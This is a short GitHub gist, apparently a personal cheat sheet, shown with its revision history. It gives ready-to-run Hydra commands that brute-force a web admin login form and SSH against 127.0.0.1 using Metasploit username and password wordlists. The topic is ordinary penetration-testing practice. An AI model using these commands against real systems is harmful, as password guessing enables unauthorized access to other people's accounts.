Last active
September 12, 2019 05:27
-
-
Save redknight99/0b8a57f38b5d9a445a561b637271e173 to your computer and use it in GitHub Desktop.
Revisions
-
redknight99 revised this gist
Sep 12, 2019 . 1 changed file with 5 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,2 +1,5 @@ # Simple Post Brute Force Example ```hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"``` # Simple SSH Brute Force Example ```hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh``` -
redknight99 revised this gist
Sep 12, 2019 . No changes.There are no files selected for viewing
-
redknight99 revised this gist
Sep 12, 2019 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,2 +1,2 @@ # Simple Post Request Example ```hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"``` -
redknight99 revised this gist
Sep 12, 2019 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,2 +1,2 @@ # Simple Post Request Example '''hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"''' -
redknight99 revised this gist
Sep 12, 2019 . No changes.There are no files selected for viewing
-
redknight99 created this gist
Sep 12, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,2 @@ # Simple Post Request Example hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"